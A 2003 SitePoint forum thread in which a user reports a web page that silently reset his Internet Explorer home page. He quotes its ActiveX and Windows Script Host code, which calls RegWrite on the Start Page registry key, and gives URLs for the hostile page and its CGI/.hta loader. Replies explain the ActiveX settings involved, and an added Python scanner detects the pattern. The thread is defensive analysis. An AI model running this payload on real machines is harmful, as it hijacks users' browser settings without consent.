  1. #1
    SitePoint Member
    Join Date
    Sep 2003
    Location
    Indiana
    Posts
    4

    Malicious javascript - Auto Set Homepage and RegWrite

    Thought that some of you may find this interesting. I plan on reporting this somewhere, but I need some direction. Webhost is dedicated and probably privately hosted, I assume that this is ISP abuse anyways.

    No alerts or anything warning that my registry was being written to and I am using IE6 with WinXP with updated virus software. I know that there were older versions like this, but I thought that the IE patch fixed the vulnerability.

    I looked for the code that changed my homepage settings and it was obfuscated. I believe that the obfuscated HEX code in the link works with this ActiveX coding below. Here it is below anyways.
    Don't open this page if you don't want to get pissed (you will get popups and a borderless full-sized window); the code is in this page:
    http://www.passthison.com/security/?st-in-1

    The code in that page points to a .hta file (hypertext-application) and is executed by a cgi file at: http://object.passthison.com/vu083003/object.cgi

    Anyways, here's the code:

    <html>
    <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script>
    wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.passthison.com/r4/?vu083003-final-destination-redirect-to------------http://www.new-default-homepage339890002228333933989000222833393398900022283339339890002228333933989000222833393398900022283339.net")
    </script>
    </html>
    Last edited by iwpgroup; Oct 2, 2003 at 23:34.
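
    An added example, not code from the thread or any poster: a static check that flags pages shaped like the one posted above, where an `<object>` tag carries the posted classid and an inline script calls `RegWrite` through that object's id. The classid and registry path are taken from the post; `scan`, the finding names and the sample page with its placeholder URL are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# classid copied from the first post; the thread ties it to Windows Script Host.
WSH_CLASSID = "clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b"
# Registry value the posted script overwrites (the IE home page).
START_PAGE = r"hkcu\software\microsoft\internet explorer\main\start page"

class _Collector(HTMLParser):
    """Records ids of <object> tags using WSH_CLASSID and inline script text."""
    def __init__(self):
        super().__init__()
        self.wsh_ids, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid", "").strip().lower() == WSH_CLASSID:
            self.wsh_ids.append(a.get("id", ""))
        if tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan(html):
    """Return (finding, detail) tuples for a page; an empty list means no match."""
    c = _Collector()
    c.feed(html)
    c.close()
    js = "".join(c.scripts)
    findings = []
    for obj_id in c.wsh_ids:
        findings.append(("wsh_object", obj_id))
        if not obj_id:
            continue
        call = re.escape(obj_id) + r"\s*\.\s*RegWrite\s*\(\s*(['\"])(.*?)\1"
        for m in re.finditer(call, js, re.I | re.S):
            key = m.group(2).replace("\\\\", "\\")  # undo JS string escaping
            kind = "homepage_hijack" if key.lower() == START_PAGE else "regwrite"
            findings.append((kind, key))
    return findings

# Constructed sample shaped like the posted page; the URL is a placeholder.
SAMPLE = r'''<html><object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid/")</script></html>'''

if __name__ == "__main__":
    print(scan(SAMPLE))
```

    Because the check only reads literal markup, it does not see objects created dynamically from script or code that stays obfuscated, both of which the thread mentions.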

  2. #2
    Perl/Mason Guru Flawless_koder's Avatar
    Join Date
    Feb 2002
    Location
    Gatwick, UK
    Posts
    1,206
    This should only work in Internet Explorer ( I'm not saying it'll only work on IE's homepage, that much is obvious, but rather that other browsers don't allow this kind of thing to happen... not to mention that they don't support windows script host ).

    On top of that: This works on an embedded activeX object. It's just the same as if it was dynamically created using jscript.
    Therefore if it did anything to your pc it's cos your security isn't set up properly.

    Go to tools->internet options->security->custom level.

    Check the settings for when active X is allowed to run.

    Better yet - swap to Mozilla

    HTH

    G
    ---=| If you're going to buy a pet - get a Shetland Giraffe |=---

  3. #3
    SitePoint Member
    Join Date
    Sep 2003
    Location
    Indiana
    Posts
    4
    Quote Originally Posted by Flawless_koder
    This should only work in Internet Explorer
    I hear you, I just think that this type of thing on the web is insulting, and a big invasion. We all complain about spyware and how companies track our steps on the net. These are the things that we all should start paying more attention to.

    Did you check out the homepage and what it said about complaints? I think that you would roll...

    Best,

    Mike

  4. #4
    I'll take mine raw silver trophy MikeFoster's Avatar
    Join Date
    Dec 2002
    Location
    Alabama, USA
    Posts
    2,560
    Better yet - swap to Mozilla
    Or Opera

    Therefore if it did anything to your pc it's cos your security isn't set up properly.

    Go to tools->internet options->security->custom level.

    Check the settings for when active X is allowed to run.
    Exactly right. I threw together a page to test your IE ActiveX security settings. The page is safe; it won't do anything until you click a button, then it tries to change your home-page to itself.

    Other resources:

    How to Stop an ActiveX Control from Running in Internet Explorer (*** I don't advise doing this unless you really, really, really know what you're doing! ***)

    Manipulating the registry with WSH

    Security Resource

